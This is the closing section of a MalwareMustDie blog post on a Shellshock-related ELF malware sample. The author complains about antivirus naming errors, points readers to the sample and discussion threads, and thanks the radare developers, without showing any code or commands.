When I speak the truth advising right information and name of this malware & showing some bad namings as the output of virus cannning, what I got is a "WHAT?" from a "younger" friend in an "industry" :-(
Obviously there is no respect of the efforts of what has been done here.. :-|
READ THE CODES, Bro, your SERVER SIDE customers in the field are REALLY counting on your skill in naming of ELF malware, UNIX servers are not a PC in its management. And again, people like us are losing jobs for the hacking incident like this, while AV may "only" lose some numbers of income from a list of customer. So, sorry for I can not be NICE for this silly mistakes.



May☩Lord always gives strength to those who can read codes, and reveal the truth as per it is.

The sample, epilogue & follow up

The sample is in Virus Total that can be accessed in here-->[link]
I am also added the Shellshock Shellcode compiles malware to its thread in kernelmode [link]

The radare.org [link] dev team is proven rock, by only reading this post they added feature to check the ip address [link] & also adding the syscall table information [link] for FreeBSD x86-32 on Linux ELF analysis purpose.
For your information I use radare since "radare", was 1st version (used it since /usr/ports), and our team is the "official" (smile) user for so long[link] w/thank you, and keep on using it happily in all my beloved Demon clusters[link]. Please support them with improvement reports!

Thank you for your participating to the vote[link] & feedback about to this post:

NOTE: The follow up of this case will be posted in here. To be noted, there are few opcodes that might have slight different translation, please bear to some small miss (if any), and kindly inform about it, but I am sure the overall analysis is correct.

#MalwareMustDie! | analysis by @unixfreaxjp


"Then you will know the truth, and the truth will set you free.”

☩John 8:32